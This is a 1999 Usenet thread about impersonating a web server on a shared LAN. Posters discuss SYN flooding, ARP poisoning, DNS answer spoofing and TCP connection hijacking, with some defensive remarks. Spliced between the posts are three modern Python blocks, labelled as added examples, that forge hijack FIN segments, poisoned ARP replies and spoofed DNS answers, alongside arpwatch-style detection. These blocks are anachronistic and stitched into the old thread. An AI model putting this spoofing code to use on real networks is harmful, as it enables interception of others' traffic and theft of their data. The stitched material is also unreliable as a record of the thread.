
Web Server "Impersonating"


ed...@my-dejanews.com

May 21, 1999, 3:00:00 AM
I want to know if it's possible to "impersonate" a web server that
runs on a LAN, so that if another PC from the same LAN requests a page
from this server, my computer/program, which is on the same segment,
delivers the page instead of the web server?

Assume all computers run on the same segment. The web server must
not know that someone else, that would be my program/computer, is
answering the requests.

Someone suggested blocking the web server port 80 by issuing a SYN
flood and putting the card in promiscuous mode and scanning all requests
going to the server at port 80 and answering them instead while the
server was unable to respond. Is this possible?

Is there another way? Can it be done?

Thanks in advance for your help.


--== Sent via Deja.com http://www.deja.com/ ==--
---Share what you know. Learn what you don't.---

Mark Lambert

May 21, 1999, 3:00:00 AM
ed...@my-dejanews.com wrote:
>
> I want to know if it's possible to "impersonate" a web server that
> runs on a LAN, so that if another PC from the same LAN requests a page
> from this server, my computer/program, which is on the same segment,
> delivers the page instead of the web server?
<snip>
> Someone suggested blocking the web server port 80 by issuing a SYN
> flood and putting the card in promiscuous mode and scanning all requests
> going to the server at port 80 and answering them instead while the
> server was unable to respond. Is this possible?
>
> Is there another way? Can it be done?
<snip>

Hmmm, tell me, does this newsgroup *look* like alt.hacking?
I thought it was a discussion group dedicated to protecting computers from
this sort of thing. Just because we discuss security holes does *not* mean we
exploit them ourselves.

Can't speak for the rest of the population of comp.security.unix, but _I'm_ not
going to help you ruin someone's day. Go peddle your bicycle elsewhere.

The opinions expressed herein are not necessarily those of my employer.

--
/\ The Fulcrum Consulting Group Mark Lambert - Consultant
/\O\ Professional Services For Operation Mark.L...@fulcrum.com.au
/ /\ Of A Networked Computing Environment ph: +61-3-9621-2100
/o | \ 12/10-16 Queen St, Melbourne VIC 3000, Australia fx: +61-3-9621-2724

Cam Penner

May 21, 1999, 3:00:00 AM
In article <3744AFA9...@fulcrum.com.au>, ma...@fulcrum.com.au says...

> ed...@my-dejanews.com wrote:
> >
> > I want to know if its possible to "impersonate" a web server that
> > runs on LAN, so that if another pc from the same LAN requests a page
> > from this server, my computer/program, which is on the same segment,
> > delivers the page instead of the web server?
> <snip>
> > Someone suggested blocking the web server port 80 by issuing a SYN
> > flood and putting the card in promiscuous mode and scanning all requests
> > going to the server at port 80 and answering them instead while the
> > server was unable to respond. Is this possible?
> >
> > Is there another way? Can it be done?
> <snip>
>
> Hmmm, tell me, does this newsgroup *look* like alt.hacking?
> I thought it was a discussion group dedicated to protecting computers from
> this sort of thing. Just because we discuss security holes does *not* mean we
> exploit them ourselves.

If, OTOH, you are developing some sort of app and need this for
development purposes, you could always put the name of the webserver in
your hosts file with the remapped address. That would redirect
everything to that address on that machine.

--
Cam

vha...@cc.helsinki.fi

May 21, 1999, 3:00:00 AM
In article <3744AFA9...@fulcrum.com.au>,

Mark Lambert <ma...@fulcrum.com.au> wrote:
>ed...@my-dejanews.com wrote:
>>
>> I want to know if its possible to "impersonate" a web server that
>> runs on LAN, so that if another pc from the same LAN requests a page
>> from this server, my computer/program, which is on the same segment,
>> delivers the page instead of the web server?
><snip>
>> Someone suggested blocking the web server port 80 by issuing a SYN
>> flood and putting the card in promiscuous mode and scanning all requests
>> going to the server at port 80 and answering them instead while the
>> server was unable to respond. Is this possible?
>>
>> Is there another way? Can it be done?
><snip>
>
>Hmmm, tell me, does this newsgroup *look* like alt.hacking?
>I thought it was a discussion group dedicated to protecting computers from
>this sort of thing. Just because we discuss security holes does *not* mean we
>exploit them ourselves.
>
>Can't speak for the rest of the population of comp.security.unix, but _I'm_ not
>going to help you ruin someone's day. Go peddle your bicycle elsewhere.
>
>The opinions expressed herein are not necessarily those of my employer.

There are commercial products which are designed to do this. The idea is
to enforce company policies: if you try to connect to www.sex.com, you will
get a screen which says 'naughty boy, you are supposed to work here,
contact your boss'.

Of course these products are very nasty. They can also store all email, in
user order; they store all the directories that you browse in ftp. They
also store all cleartext accounts and passwords.

They spy on everything, and present the information in an organised way.

And a really working demo version of such a program is available on the net!
It works for 1-2 months. Think what you can find out about your colleagues in
4 weeks...

VesA

Barry Margolin

May 21, 1999, 3:00:00 AM
In article <7i2vnl$7...@alca.helsinki.fi>, <Vesa....@Helsinki.FI> wrote:
>There are commercial products which are designed to do this. The idea is
>to enforce company policies: if you try to connect www.sex.com, you will
>get a screen which says 'naughty boy, you are supposed to work here,
>contact your boss'

These products generally run on a firewall or proxy that sits between your
LAN and the Internet. The original poster was asking about ways of
intercepting traffic within the same LAN, which is very different.

--
Barry Margolin, bar...@bbnplanet.com
GTE Internetworking, Powered by BBN, Burlington, MA
*** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
Please DON'T copy followups to me -- I'll assume it wasn't posted to the group.

Jeroen Willems

May 21, 1999, 3:00:00 AM
Do you mean that you want to spoof the requested web site and that you
want to monitor proper surfing practices of colleagues? In principle
that is possible, but then it should be known to all users that they can
be scrutinised. Otherwise the users may feel they have been entrapped.

I think good information on company policy and a personal talk are more
effective.

Regards,

jEroen

Brian Hampson

May 21, 1999, 3:00:00 AM
Barry Margolin (bar...@bbnplanet.com) wrote:

: In article <7i2vnl$7...@alca.helsinki.fi>, <Vesa....@Helsinki.FI> wrote:
: >There are commercial products which are designed to do this. The idea is
: >to enforce company policies: if you try to connect www.sex.com, you will
: >get a screen which says 'naughty boy, you are supposed to work here,
: >contact your boss'
:
: These products generally run on a firewall or proxy that sits between your
: LAN and the Internet. The original poster was asking about ways of
: intercepting traffic within the same LAN, which is very different.

Interestingly, I ran into one that DOESN'T. Strange. I have a feeling it
works using RIP or some sort, but it destroys our router something fierce.

Barry, shoot me email if you want to know the product. Very strange
indeed.

B.
--


Please send administrative requests to ad...@ASL.CA

Brian P. Hampson ASL Analytical Service Laboratories Ltd
System Administrator, Vancouver, BC (604)253-4188
----------------- http://www.ASL.CA/ ----------------------------

I'm not speaking for the company <- They made me say that.


Le Rhinitis Seen

May 21, 1999, 3:00:00 AM
I'll answer this with the assumption that people would like to know how to
be invulnerable to this attack. The following document demonstrates how to
"hijack" a TCP-established connection on Telnet, but it could also
conceivably be used for other ports. The moral of this may be that https
should be used even on "protected" DMZs for fear of sniffing going on by
users of the DMZ. Of course, that's true just because of the
clear-text-ness of HTTP, let alone imitating a server.

http://www.cyberoasis.net/download/iphijack.txt

In comp.security.firewalls ed...@my-dejanews.com wrote:
> I want to know if it's possible to "impersonate" a web server that
> runs on a LAN, so that if another PC from the same LAN requests a page
> from this server, my computer/program, which is on the same segment,
> delivers the page instead of the web server?

> Assume all computers run on the same segment. The web server must
> not know that someone else, that would be my program/computer, is
> answering the requests.

> Someone suggested blocking the web server port 80 by issuing a SYN
> flood and putting the card in promiscuous mode and scanning all requests
> going to the server at port 80 and answering them instead while the
> server was unable to respond. Is this possible?

> Is there another way? Can it be done?

> Thanks in advance for your help.
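The connection hijack that the linked document describes, worked through as an added example (this code is not from the thread, from that document, or from any tool named here). Given a sniffed client-to-server TCP segment, a forged server-to-client FIN has to carry seq equal to the client's last ack and ack equal to the client's seq plus the payload length, and it has to have valid IP and TCP checksums or the client's stack drops it silently. The addresses, ports and the GET request are constructed for the example; actually putting the packet on the wire needs a raw socket and is left out.

```python
import socket
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10

def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words, odd length zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"", ttl=64):
    """Minimal IPv4 + TCP segment (no options) with both checksums filled in."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, 6, len(tcp) + len(payload)))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0, 0x4000, ttl, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload

def parse_ipv4_tcp(pkt):
    """Pull out what the hijacker needs from a sniffed segment."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    sport, dport, seq, ack, off, flags = struct.unpack("!HHIIBB", tcp[:14])
    return {"src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "payload": tcp[(off >> 4) * 4:]}

def tcp_checksum_ok(pkt):
    """A receiver recomputes over pseudo-header + segment; a valid packet sums to 0."""
    ihl = (pkt[0] & 0x0F) * 4
    seg = pkt[ihl:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(seg))
    return checksum(pseudo + seg) == 0

def forge_fin_from_server(observed):
    """Given a sniffed client->server segment, build the segment the server would
    send next, with FIN set. The client accepts it only if seq is exactly what it
    expects from the server (its own last ack) and ack covers what it just sent."""
    seq = observed["ack"]
    ack = (observed["seq"] + len(observed["payload"])) & 0xFFFFFFFF
    return build_ipv4_tcp(observed["dst"], observed["src"],
                          observed["dport"], observed["sport"],
                          seq, ack, FIN | ACK)

def demo():
    """Constructed capture: a client on the LAN sends a GET to the web server."""
    request = build_ipv4_tcp("192.168.1.20", "192.168.1.10", 40000, 80,
                             seq=1000, ack=5000, flags=PSH | ACK,
                             payload=b"GET / HTTP/1.0\r\n\r\n")
    observed = parse_ipv4_tcp(request)
    forged = forge_fin_from_server(observed)
    return observed, parse_ipv4_tcp(forged), tcp_checksum_ok(forged)

if __name__ == "__main__":
    obs, fin, ok = demo()
    print(fin, ok)
```

The same seq/ack bookkeeping is what lets the attacker keep talking to the client after the FIN; if the real server's reply gets there first, the numbers no longer line up and the client discards the forged segment, which is why the thread pairs this with stalling the server. HTTPS does not stop the teardown, but it does stop the attacker from supplying a page the client will trust.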

Craig Johnston

May 22, 1999, 3:00:00 AM
In article <7i4qjt$n3d$1...@spider.asl.ca>, Brian Hampson <br...@ASL.CA> wrote:
>Barry Margolin (bar...@bbnplanet.com) wrote:
>: In article <7i2vnl$7...@alca.helsinki.fi>, <Vesa....@Helsinki.FI> wrote:
>: >There are commercial products which are designed to do this. The idea is
>: >to enforce company policies: if you try to connect www.sex.com, you will
>: >get a screen which says 'naughty boy, you are supposed to work here,
>: >contact your boss'
>:
>: These products generally run on a firewall or proxy that sits between your
>: LAN and the Internet. The original poster was asking about ways of
>: intercepting traffic within the same LAN, which is very different.
>
>Interestingly, I ran into one that DOESN'T. Strange. I have a feeling it
>works using RIP or some sort, but it destroys our router something fierce.

I've done something very similar by playing ARP games. It took some
trial and error because implementations of ARP vary in their behavior.

You basically use ARP to lie to all the local interfaces (except the
router) about the MAC address that corresponds to the webserver's IP.
Give out a made-up MAC address. Then promiscuously grab packets destined for
that MAC address and either handle them yourself or rewrite the
ethernet header and forward as necessary.

Getting all the details right took some trial and error but I was
able to get something to do pretty much what I take it the poster
is asking for. It's a pretty ugly hack, IMO, and it would be much
preferable to route packets for the webserver through the intermediate
machine and have it either answer itself or forward the request to
the real webserver, depending.
--
Craig Johnston
c...@lfn.org
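Craig's ARP trick in code, as an added example (not anything posted in the thread, and not Craig's own program): it builds the Ethernet/ARP reply frame that tells a client the web server's IP lives at a made-up MAC, shows the destination-MAC rewrite used for forwarding, and pairs both with the arpwatch-style check that catches the lie (the first MAC seen for an IP is remembered; any later claim of a different MAC is an alert). All addresses are constructed for the example. Sending the frame needs a raw socket and root and is left out; the point is the byte layout and the detection.

```python
import struct

# Constructed addresses for the example (not from the thread).
SERVER_IP  = "192.168.1.10"
SERVER_MAC = "00:aa:bb:cc:dd:ee"   # the real web server
VICTIM_IP  = "192.168.1.20"
VICTIM_MAC = "00:11:22:33:44:55"   # the client being lied to
FAKE_MAC   = "02:de:ad:be:ef:01"   # made-up MAC the attacker listens for

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2

def mac_bytes(mac): return bytes(int(x, 16) for x in mac.split(":"))
def mac_str(b):     return ":".join(f"{x:02x}" for x in b)
def ip_bytes(ip):   return bytes(int(x) for x in ip.split("."))
def ip_str(b):      return ".".join(str(x) for x in b)

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an unsolicited ARP reply, 'sender_ip is at
    sender_mac', delivered to target_mac. 14-byte Ethernet + 28-byte ARP."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet/IPv4, opcode
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp

def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP over IPv4."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}

def rewrite_eth_dst(frame, new_dst_mac):
    """The forwarding step Craig mentions: a frame sniffed for the fake MAC gets its
    destination rewritten to the real server's MAC and goes back on the wire."""
    return mac_bytes(new_dst_mac) + frame[6:]

class ArpWatch:
    """arpwatch-style detector: remember the first MAC seen for each IP and flag
    any later frame claiming a different one. observe() returns the alert tuple
    (ip, old_mac, new_mac) or None."""
    def __init__(self):
        self.table = {}
        self.alerts = []

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known != mac:
            alert = (ip, known, mac)
            self.alerts.append(alert)
            return alert
        return None

def demo():
    """Legitimate reply first, then the poisoned one; only the second raises an alert."""
    watch = ArpWatch()
    legit  = build_arp_reply(SERVER_MAC, SERVER_IP, VICTIM_MAC, VICTIM_IP)
    poison = build_arp_reply(FAKE_MAC, SERVER_IP, VICTIM_MAC, VICTIM_IP)
    return watch.observe(legit), watch.observe(poison)

if __name__ == "__main__":
    print(demo())
```

A made-up MAC works on a switched segment because no switch has learned it, so frames addressed to it are flooded out every port, including the attacker's; on a hub everything is visible anyway. Static ARP entries on the clients (arp -s on most Unix hosts) or ARP inspection on a managed switch are the countermeasures at this layer; neither protects the page content itself, which is Le Rhinitis Seen's argument for HTTPS.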

ed...@my-dejanews.com

May 22, 1999, 3:00:00 AM
My message was not meant at all to be for hacking. I am taking a
Computer Networks class and my teacher asked if this was possible while
we studied the DNS protocol. Don't be defensive to every post you read.
Btw, thanks to all those that answered my question without questioning
my reasons. (Sorry for bad English.)

> <snip>
>
> Hmmm, tell me, does this newsgroup *look* like alt.hacking?
> I thought it was a discussion group dedicated to protecting computers from
> this sort of thing. Just because we discuss security holes does *not* mean we
> exploit them ourselves.

ed...@my-dejanews.com

May 22, 1999, 3:00:00 AM

Someone suggested this to me; I don't know what you guys think:
Promiscuously grab packets destined for the web server, and when I
detect a DNS request for the web server, spoof it, answering back
to the machine which made the DNS query with my IP, so that machine, instead of
accessing the Web Server it originally wanted, would be served by my
machine without the other two ever knowing what happened.
Is this possible?
Btw, if you wonder what this question is about, it's just a debate we
had in Computer Networks class discussing the DNS protocol and security.
I just had to know the answer, so I asked the gurus :)

> You basically use ARP to lie to all the local interfaces (except the
> router) about the MAC address that corresponds to the webserver's IP.
> Give out a made-up MAC address. Then promiscuously grab packets destined for
> that MAC address and either handle them yourself or rewrite the
> ethernet header and forward as necessary.

> Craig Johnston
> c...@lfn.org

rv...@removethiscistron.nl

May 22, 1999, 3:00:00 AM
In comp.security.firewalls ed...@my-dejanews.com wrote:
> Someone suggested this to me; I don't know what you guys think:
> Promiscuously grab packets destined for the web server, and when I
> detect a DNS request for the web server, spoof it, answering back
> to the machine which made the DNS query with my IP, so that machine, instead of
> accessing the Web Server it originally wanted, would be served by my
> machine without the other two ever knowing what happened.
> Is this possible?

Your question isn't clear.
If you wanted to pretend you're a different machine, you could do it in
two ways.
The first way is detecting the request for the IP number of your webserver's
name, and replying with a spoofed DNS answer, giving your IP as the webserver's
IP.
You would have to be able to sniff or predict or fake the sequence numbers
from the DNS packet. A way to do this is described in one of the Phrack issues,
can't remember which one, but you can find them at www.phrack.com.

The second way would be to be on the physical segment where the webserver
is located, sniff packets destined for the webserver, and fake FIN packets
to terminate each connection made to the webserver.
Then you could continue the connection with spoofed packets from your own
host, keeping sequence numbers in mind, and sniffing the replies the remote host
sends back to your webserver.

Both ways would be hard to do; you'd have to write your own implementation
for the second way, the first way can be done with the ADM utilities.
I never got the first way to work though ;)

Robert

--

| rv...@cistron.nl - Cistron Internet Services - www.cistron.nl |
| php3/c/perl/html/c++/sed/awk/linux/sql/cgi/security |
| My statements are mine, and not necessarily cistron's. |
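Robert's first way, worked through as an added example (this is not the thread's code and not the ADM utilities). The field a forged UDP answer has to match is the 16-bit transaction ID in the DNS header (RFC 1035), together with the question section and, on the resolver side, the UDP source port of the query; there is no TCP-style sequence number to predict. On a shared segment the sniffer reads the ID straight off the query, so the only race is against the real server's reply. The code below builds the query a client would send, forges the answer from it, and runs the checks a stub resolver applies, showing that the forgery passes and a wrong-ID answer does not. The name and addresses are constructed for the example.

```python
import struct

QTYPE_A, QCLASS_IN = 1, 1

def encode_name(name):
    """Wire-format name: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(msg, off):
    """Read a (possibly compressed) name; return (name, offset just past it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)

def build_query(txid, name, qtype=QTYPE_A):
    """Standard recursive query: header + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)

def parse(msg):
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"txid": txid, "flags": flags, "questions": questions, "answers": answers}

def forge_answer(sniffed_query, spoofed_ip, ttl=300):
    """What the attacker puts on the wire: the sniffed txid and question copied
    verbatim, one A record pointing at the attacker's own host."""
    q = parse(sniffed_query)
    name, qtype, qclass = q["questions"][0]
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)   # QR, RD, RA
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    rr = (struct.pack("!H", 0xC00C)                                 # pointer to question name
          + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
          + bytes(int(x) for x in spoofed_ip.split(".")))
    return header + question + rr

def resolver_accepts(query, response):
    """The checks a stub resolver applies to a UDP answer (RFC 1035): txid must
    match, QR must be set, the question must echo back. The UDP source-port
    check lives outside these bytes. A forgery that copied the query passes."""
    q, r = parse(query), parse(response)
    return (q["txid"] == r["txid"]
            and bool(r["flags"] & 0x8000)
            and q["questions"] == r["questions"])

def demo():
    query = build_query(0x1A2B, "intranet.example")     # constructed, as sniffed off the LAN
    forged = forge_answer(query, "192.168.1.66")         # attacker's host (constructed)
    stale = forge_answer(build_query(0x1A2C, "intranet.example"), "192.168.1.66")
    return resolver_accepts(query, forged), resolver_accepts(query, stale), parse(forged)["answers"]

if __name__ == "__main__":
    print(demo())
```

Source-port randomisation and the answer-matching rules of RFC 5452 raise the bar for a blind attacker but do nothing here, because the attacker sees the query; only validated data (DNSSEC) or an end-to-end check such as the certificate on an HTTPS connection catches the substituted host. Which is also why the in-class answer to the original question is "yes, on a shared segment, and that is what the client-side checks cannot fix."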

Clifford Eugene Smith

May 22, 1999, 3:00:00 AM
rv...@REMOVETHIScistron.nl wrote:

: Both ways would be hard to do, you'd have to write your own implementation


: for the second way, the first way can be done with the ADM utilities.
: I never got the first way to work though ;)

As a side note, this is impossible if your ISP uses encrypting routers or
switches. For instance, Georgia Tech's hubs encrypt transparently to the
MAC address of the destination. Thus, in this type of setting, it would be
impossible without router access.

--Clifford Smith


rv...@removethiscistron.nl

May 22, 1999, 3:00:00 AM

That is when you're between routers; you can't decrypt what's coming over
the line, but because there's no need to change the TCP/IP stack on the
webserver or the client, TCP/IP traffic to the nearest router is business
as usual, meaning you would still be able to do it this way...
unless of course the router has static MAC addresses connected to IP addresses,
and denies forwarding of IP addresses that are not connected to the MAC address
in its table. Then you would have to use MAC address spoofing as well.
Correct me if I'm wrong here, but I don't think encrypting routers would
be of any use to defeat IP/DNS spoofing attacks. Their only use should be
the providing of an encrypted, secure way of passing traffic between routers.

Export4

Jun 3, 1999, 3:00:00 AM

Interesting article......

Mike
